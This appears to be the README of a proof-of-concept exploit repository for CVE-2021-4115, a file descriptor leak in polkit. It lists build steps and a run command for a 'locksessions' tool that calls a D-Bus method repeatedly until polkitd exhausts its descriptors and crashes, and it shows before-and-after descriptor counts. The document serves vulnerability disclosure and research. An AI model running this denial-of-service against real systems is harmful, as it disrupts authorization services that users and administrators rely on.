This repository contains a proof of concept exploit for CVE-2021-4115: file descriptor exhaustion in polkit.
Instructions for building the PoC:
git submodule update --init # Download https://github.com/kevinbackhouse/DBusParse
mkdir build
cd build
cmake ..
makeThe PoC causes polkit to leak eventfd file descriptors. After several runs of the PoC, polkit will leak so many file descriptors that it will crash due to exceeding its quota of file descriptors.
First, check how many file descriptors polkit has open:
$ sudo ls -l /proc/`pidof polkitd`/fd | wc
12 123 680Now run the PoC:
./locksessions /var/run/dbus/system_bus_socket 0x4000(The PoC is named locksessions because it calls the org.freedesktop.login1.Manager.LockSessions D-Bus method.)
Now check again how many file descriptors polkit has open:
$ sudo ls -l /proc/`pidof polkitd`/fd | wc
255 2796 16872
Notice that a large number of eventfd file descriptors have been leaked. After few more runs of the PoC, polkit will most likely crash.